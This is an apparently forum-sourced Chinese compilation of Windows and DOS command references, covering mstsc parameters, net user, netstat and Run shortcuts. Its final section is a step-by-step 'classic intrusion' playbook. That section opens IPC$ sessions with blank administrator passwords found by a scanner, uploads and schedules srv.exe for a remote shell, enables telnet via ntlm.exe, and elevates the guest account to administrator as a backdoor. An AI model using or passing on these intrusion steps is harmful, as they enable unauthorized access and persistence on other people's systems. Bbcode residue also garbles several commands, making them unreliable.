1: 在xp sp2中用mstsc /console命令可以登錄到遠程桌面的控制台(和在電腦前以同一用戶登錄),xp升級到sp3后,不能這樣用了。sp3中命令應該換成mstsc /admin。
2: xp sp3中mstsc的參數如下:
3: MSTSC [] [/v:] [/admin] [/f[ullscreen]] [/w: /h:] [/public] | [/span] [/edit "connection file"] [/migrate]
4: "connection file" -- 指定連接的 .rdp 文件的名稱。
5: /v: -- 指定要連接的遠程計算機。
6: /admin -- 將您連接到會話以管理服務器。
7: /f -- 以全屏模式啟動遠程桌面。
8: /w: -- 指定遠程桌面窗口的寬度。
9: /h: -- 指定遠程桌面窗口的高度。
10: /public -- 在公用模式下運行遠程桌面。
11: /span -- 使遠程桌面的寬度和高度與本地虛擬桌面相匹配,如有必要,擴展到多個顯示器。若要擴展到多個顯示器,所有顯示器都必須具有相同的高度並垂直排列。
12: /edit -- 打開指定的 .rdp 連接文件進行編輯。
13: /migrate -- 將使用客戶端連接管理器創建的舊連接文件遷移到新的 .rdp 連接文件。
14:
15: 2003 sp2中的mstsc參數用法:MSTSC [] [/v:] [/console] [/f[ullscreen]]
16: [/w: /h:] | /Edit"ConnectionFile" | /Migrate | /?-- 指定連接的 .rdp 文件的名稱。
17: /v: -- 指定要連接到的終端服務器。
18: /console -- 連接到服務器的控制台會話。
19: /f -- 以全屏模式啟動客戶端。
20: /w: -- 指定遠程桌面屏幕的寬度。
21: /h: -- 指定遠程桌面屏幕的高度。
22: /edit -- 打開指定的 .rdp 文件來編輯。
23: /migrate -- 將客戶端連接管理器創建的舊版連接文件遷移到新的 .rdp 連接文件。
24: /? -- 顯示此用法消息。
DOS遠程桌面連接命令 mstsc /v: 192.168.1.250 /console
1: cmd 運行 command
2: 刪除文件 rd 文件名/S
3: 創建文件 MD 文件名
4: 1. net user admin godmour /add 新建一個用戶名為 admin 密碼為 godmour 默認為user組成員
5: 2. net user admin /del 將用戶名為admin的用戶刪除
6: 3. net user admin /active:no 將用戶admin禁用
7: 4. net user admin /active:yes 將用戶admin激活
8: 5. net user admin 查看擁護admin用戶的情況
9: 6. net localgroup administratros admin /add 提升用戶權限
10: 7. net view [url=file://ip/]\\IP[/url] 查看遠程主機共享資源
11: 8. net use x:\\IP\sharename 遠程影射本地盤符 Z (建立連接 net use [url=file://ip/IPC$%22password]\\IP\IPC$"password[/url]" /user:"name")
12: 9. net user admin godmour 把admin的密碼修改成 godmour
13: 10. net start servername 啟動 telnet 服務
14: net stop servername 停止 telnet 服務
15: 運行 輸入cmd 回車在命令提示符下輸入
16: for %1 in (%windir%\system32\*.dll) do regsvr32.exe /s %1
17: 還原系統
18: tracert 61.144.56.101 查看路由是否正常工作
19: netstat命令
20: netstat [-r] [-s] [-n] [-a]。
21: 當然,你也可以利用“netstat /?”命令來查看一下該命令的使用格式以及詳細的參數說明
22: netstat參數含義如下
23: -r 顯示本機路由表的內容
24: -s 顯示每個協議的使用狀態(包括TCP協議、UDP協議、IP協議)
25: -n 以數字表格形式顯示地址和端口
26: -a 顯示所有主機的端口號
27: 運行Netstat -a命令將顯示計算機上網時與外部之間的所有連接,計算機端口與外部的連接情況等;而Netstat
28: -s命令則顯示電腦網絡連接協議的統計信息。這樣你就可以看到當前你的電腦上網絡在進行哪些連接,數據包發
29: 送和接收的詳細情況等等添加或刪除程序 control appwiz.cpl
30: 管理工具 control admintools
31: attrib設置文件屬性 ctty改變控制設備 defrag磁盤碎片整理 doskey 調用和建立DOS宏命令
32: debug程序調試命令 emm386擴展內存管理 fc文件比較 fdisk 硬盤分區
33: lh/loadhigh 將程序裝入高端內存 move 移動文件,改目錄名 more 分屏顯示
34: prompt 設置提示符 set 設置環境變量 smartdrv 設置磁盤加速器
35: setver 設置版本 subst 路徑替換 vol 顯示指定的磁盤卷標號
36: xcopy 拷貝目錄和文件 mstsc XP自帶遠程 secpol.msc /s 本地安全策略
37: services.msc /s 服務 compmgmt.msc 計算機管理 jsjgl.msc
38: eventvwr.msc /s 事件查看器 odbcad32.exe 數據源 (ODBC) perfmon.msc /s 性能
39: comexp.msc 組件服務 control userpasswords2 察看當前XP用戶
40: gpedit.msc 組策略 regedit 注冊表 dxdiag DirecTX 診斷工具
41: gpedit.msc-----組策略 winver---------檢查Windows版本 wmimgmt.msc----打開windows管理體系結構(WMI)
42: wupdmgr--------windows更新程序 wscript--------windows腳本宿主設置 write----------寫字板
43: winmsd---------系統信息 wiaacmgr-------掃描儀和照相機向導 winchat--------XP自帶局域網聊天
44: mem.exe--------顯示內存使用情況 Msconfig.exe---系統配置實用程序 mplayer2-------簡易widnows media player
45: mspaint--------畫圖板 mplayer2-------媒體播放機 magnify--------放大鏡實用程序
46: mmc------------打開控制台 mobsync--------同步命令 drwtsn32------ 系統醫生
47: devmgmt.msc--- 設備管理器 dfrg.msc-------磁盤碎片整理程序 diskmgmt.msc---磁盤管理實用程序
48: dcomcnfg-------打開系統組件服務 ddeshare-------打開DDE共享設置 dvdplay--------DVD播放器
49: net stop messenger---停止信使服務 net start messenger--開始信使服務 notepad--------打開記事本
50: nslookup-------網絡管理的工具向導 ntbackup-------系統備份和還原 narrator-------屏幕“講述人”
51: ntmsmgr.msc----移動存儲管理器 ntmsoprq.msc-移動存儲管理員操作請求 netstat -an----(TC)命令檢查接口
52: syncapp--------創建一個公文包 sysedit--------系統配置編輯器 sigverif-------文件簽名驗證程序
53: sndrec32-------錄音機 shrpubw--------創建共享文件夾 secpol.msc-----本地安全策略
54: syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
55: services.msc---本地服務設置 Sndvol32-------音量控制程序 sfc.exe--------系統文件檢查器
56: sfc /scannow---windows文件保護 tsshutdn-------60秒倒計時關機命令 tourstart------xp簡介(安裝完成后出現的漫游xp程序)
57: taskmgr--------任務管理器 eventvwr-------事件查看器 eudcedit-------造字程序
58: explorer-------打開資源管理器 packager-------對象包裝程序 perfmon.msc----計算機性能監測程序
59: progman--------程序管理器 regedit.exe----注冊表 rsop.msc-------組策略結果集
60: regedt32-------注冊表編輯器 rononce -p ----15秒關機 regsvr32 /u *.dll----停止dll文件運行
61: regsvr32 /u zipfldr.dll------取消ZIP支持 cmd.exe--------CMD命令提示符
62: chkdsk.exe-----Chkdsk磁盤檢查 certmgr.msc----證書管理實用程序 calc-----------啟動計算器
63: charmap--------啟動字符映射表 cliconfg-------SQL SERVER 客戶端網絡實用程序 Clipbrd--------剪貼板查看器
64: conf-----------啟動netmeeting compmgmt.msc---計算機管理 cleanmgr-------垃圾整理
65: ciadv.msc------索引服務程序 osk------------打開屏幕鍵盤 odbcad32-------ODBC數據源管理器
66: oobe/msoobe /a----檢查XP是否激活 lusrmgr.msc----本機用戶和組 logoff---------注銷命令
67: iexpress-------木馬捆綁工具,系統自帶 Nslookup-------IP地址偵測器 fsmgmt.msc-----共享文件夾管理器
68: utilman--------輔助工具管理器 gpedit.msc-----組策略 cleanmgr-------垃圾整理
69: ciadv.msc------索引服務程序 odbcad32-------ODBC數據源管理器 oobe/msoobe /a----檢查XP是否激活
70: lusrmgr.msc----本機用戶和組 logoff---------注銷命令 iexpress-------木馬捆綁工具,系統自帶
71: Nslookup-------IP地址偵測器 fsmgmt.msc-----共享文件夾管理器 utilman--------輔助工具管理器
72: DOS——Disk Operation System 磁盤操作系
73: C: 盤符 Path 路徑 Filename 文件名 .ext 擴展名 Filespec 文件標識符
74: [ ] 方括號中的項目是可選項,用戶可以根根據需要不輸入這些內容
75: { } 大括號表示其中的項目必選一項
76: | 豎線表示兩側的內容可取其一
77: … 表示可重復項
78: * 表示一個字符串
79: ? 只代表一個字符
80: 查找以字母y開頭的所有文件,可以輸入以下命令:dir y*.*;如果要查找所有擴展名為exe的文件,可以用dir .exe。?只
81: 代表一個字符,例如我要查找第二個字母為s的所有文件,可以輸入:DIR ?s*.*。
82: dir
83: [格式] dir [C:][path][filename][.ext][/o][/s][/p][/w][/a]
84: dir是DOS命令中最常用的一個
85: /p 顯示信息滿一屏時,暫停顯示,按任意鍵后顯示下一屏
86: /o 排序顯示。o后面可以接不同意義的字母
87: /w 只顯示文件名目錄名,每行五個文件名。即寬行顯示
88: /s 將目錄及子目錄的全部目錄文件都顯示
89: cd是英文change directory(改變目錄)的縮寫
90: [格式] cd [C:][path] 逐層退出(cd..)
91: copy在英文中是復制的意思
92: 復制一個或一組文件到指定的磁盤或目錄中 copy [C:][path][filename.ext] [C:][path]filename.ext
93: C:\purple目錄的所有文件復制到軟盤
94: C:\>copy purple A:\
95: ren是英文rename(重新命名)的簡寫,對指定磁盤、目錄中的一個文件或一組文件更改名稱
96: [格式] ren [C:][path]filename1[.ext] filename2[.ext]
97: [說明] 改名操作只限於某個文件某組文件的名稱,它不會更改文件所在的目錄。如果使用了通配符,則對一批文件進行更名。
98: type [功能] 在屏幕上顯示文本文件內容命令 [格式] type [C:][path]filename.ext
99: type命令用來在屏幕上快速、簡便地顯示文本文件的內容,擴展名為TXT的文件是文本文件。如果用這個命令顯示擴展名為EXE或COM等其它文件,輸出的結果往往是一些亂七八糟的符號並伴有無規則的響鈴聲,有時甚至會出現死機現象。
100: format 磁盤格式化 [C:][path]format drive:[/S]
101: diskcopy,翻譯成中文就是磁盤復制 復制出一個和原來磁盤內容一模一樣的磁盤
102: [格式] diskcopy 源驅動器名 目的驅動器名
103: [說明] 它的主要用途就是用來備份。比如我們的電腦在剛買來時,會隨機附帶一些設備驅動程序磁盤,這些驅動程序在以后都有可能用到,為防止這些磁盤的損壞,一定要將它們都備份一套,這時,使用diskcopy命令是比較快捷和方便的
104: deltree 刪除目錄樹 [格式] [C:][path]DELTREE [C1:][path1] [[C2:][path2] […]]
105: [說明] 這個命令將整個指定目錄樹全部消滅,而不管它是否是只讀、隱藏與否。使用應特別小心。它是一個危險命令。
106: mem是memory的縮寫[功能] 該命令用來查看你的計算機內存有多少,以及內存的使用情況 [格式] 直接鍵入mem命令
107: chkdsk是check disk的縮寫。[功能] 用來檢查你的磁盤的使用情況。[格式] chkdsk 磁盤名
108: [說明] 例如要檢查A盤使用情況,就輸入chkdsk A: ,檢查c盤使用情況,就輸入chkdsk C: ,如果直接輸入chkdsk,就檢
109: 查當前磁盤的使用情況。
110: sys 傳遞系統文件命令。將DOS的兩個隱含的系統IO.SYS和MSDOS.SYS傳送到目標磁盤的特定位置上,並將COMMAND.COM文件復制過去。完成后,目標盤成為DOS的啟動盤[格式] [C:][path]SYS [C1:][path] d2:
111: [說明] 由於這幾個文件需要復制到特定位置上,所以用COPY命令完成的復制未必能夠啟動機器。能過SYS命令,DOS可以將目標盤已占據特定位置的文件移動,並將系統文件復制到相應位置上。參數C1:path用來指明系統文件所在目錄。如不指明,則缺省為當前盤的當前目錄。所以這個
112: 命令一般要在源盤的根目錄進行
113: pass [功能] 設定DOS尋找.COM、.EXE、.BAT文件的所在目錄 [格式] path=[[drive:]path[;…]]或path
114: [說明] 只打path沒有參數時,只顯示環境變量內容。有參數時,重新設置path變量。在沒有指定path環境變量時,用戶發出的命令,DOS首先判斷其是否為內部命令,再查找當前目錄中是否有主文件名是該命令的可執行文件,如果均不是,則顯示信息“Bad command or filename”。
115: 如果發出了指定路徑的命令,則在指定徑中依次查找,仍找不到則出現上述提示。
116: cls 清除顯示器屏幕上的內容,使DOS提示符到屏幕左上角。
1: 常用的遠程連接命令建立空連接
2: net use [url=file://ip/ipc$Content$nbsp]\\IP\ipc$Content$nbsp[/url];
3: "" /user:"" (一定要注意:這一行命令中包含了3個空格) 建立非空連接
4: net use [url=file://ip/ipc$Content$nbsp]\\IP\ipc$Content$nbsp[/url];
5: "用戶名" /user:"密碼" (同樣有3個空格)
6: 映射默認共享 net use z: [url=file://ip/c$Content$nbsp]\\IP\c$Content$nbsp[/url];
7: "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
8: 如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,
9: 具體命令 net use z: [url=file://ip/c$]\\IP\c$[/url]
10: 刪除一個ipc$連接 net use [url=file://ip/ipc$Content$/del]\\IP\ipc$Content$/del[/url]
11: 刪除共享映射 net use c: /del 刪除映射的c盤,其他盤類推
12: net use * /del 刪除全部,會有提示要求按y確認
13:
14: 經典入侵模式
15: 1.C:\>net use [url=file://127.0.0.1/IPC$Content$nbsp]\\127.0.0.1\IPC$Content$nbsp[/url];"" /user:"admintitrators"
16: 這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
17: 2. C:\>copy srv.exe [url=file://127.0.0.1/admin$Content$nbsp]\\127.0.0.1\admin$Content$nbsp[/url]; 先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。
18: 3.C:\>net time [url=file://127.0.0.1/]\\127.0.0.1[/url] 查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
19: 4.C:\>at [url=file://127.0.0.1/]\\127.0.0.1[/url]11:05 srv.exe 用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎么啟動啊,呵呵!)
20: 5.C:\>net time [url=file://127.0.0.1/]\\127.0.0.1[/url] 再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
21: 6.C:\>telnet 127.0.0.1 99 這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。 雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
22: 7.C:\>copy ntlm.exe [url=file://127.0.0.1/admin$Content$nbsp]\\127.0.0.1\admin$Content$nbsp[/url]; 用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
23: 8.C:\WINNT\system32>ntlm 輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然后使用"net start telnet"來開啟Telnet服務!
24: 9.Telnet 127.0.0.1,接着輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈) 為了以防萬一,我們再把guest激活加到管理組
25: 10.C:\>net user guest /active:yes 將對方的Guest用戶激活
26: 11.C:\>net user guest 1234 將Guest的密碼改為1234,或者你要設定的密碼
27: 12.C:\>net localgroup administrators guest /add
28: 將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機) ipc$與空連接,139,445端口,默認共享的關系 以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂) ipc$與空連接 不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了. 許多人可能要問了,既然可以空連接,那我以后就空連接好了,為什么還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何權限(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的權限(有權限誰不想呀,所以還是老老實實掃吧,不要偷懶喲). ipc$與139,445端口 ipc$連接可以實現遠程登陸及對默認共享的訪問;而139端口的開啟表示netbios協議的應用,我們可以通過139,445(win2000)端口實現對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的. ipc$與默認共享 默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享) ipc$連接失敗的原因
29: 以下5個原因是比較常見的:
30: 1)你的系統不是NT或以上操作系統;
31: 2)對方沒有打開ipc$默認共享
32: 3)對方未開啟139或445端口(惑被防火牆屏蔽)
33: 4)你的命令輸入有誤(比如缺少了空格等)
34: 5)用戶名或密碼錯誤(空連接當然無所謂了)
35: 另外,你也可以根據返回的錯誤號分析原因:
36: 錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員權限的,先提升權限;
37: 錯誤號51,Windows 無法找到網絡路徑 : 網絡有問題;
38: 錯誤號53,找不到網絡路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(端口過濾);
39: 錯誤號67,找不到網絡名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
40: 錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。